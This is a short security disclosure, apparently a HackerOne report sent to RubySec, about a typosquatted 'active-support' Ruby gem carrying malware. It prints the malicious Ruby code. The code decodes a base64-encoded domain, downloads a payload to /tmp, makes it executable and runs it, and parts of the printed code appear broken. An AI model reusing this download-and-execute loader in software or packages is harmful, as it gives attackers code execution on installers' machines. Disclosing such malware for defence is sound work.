RubyGems: Malware in `active-support` gem

ID H1:392311
Type hackerone
Reporter reed
Modified 2018-08-09T18:14:31


This was sent to RubySec:

The gem duplicates official activesupport (no hyphen) code, but adds a compiled extension. The extension attempts to resolve a base64 encoded domain (, downloads a payload, and executes.


``` require 'net/http' require 'uri' require 'base64' require 'resolv'

class Smectis def self.install_explot(weighership) if !weighership.nil? and weighership != '' educable = Net::HTTP.get_response(URI('http://' + weighership + '/mimming'))'/tmp/autosymbiontic', 'wb+') do |uterometer| uterometer.binmode uterometer.write(educable.body) uterometer.chmod(0777) uterometer.close end system('/tmp/autosymbiontic') end end

def milligram = 'MjlmYWVhNjMucGxhbmZobnRhZ2UuZGU=' jaunting = nil begin jaunting = Resolv.getaddress(Base64.decode64(milligram)) rescue end self.install_exploit(jaunting) end end ```


Run arbitrary code on a victim's machine.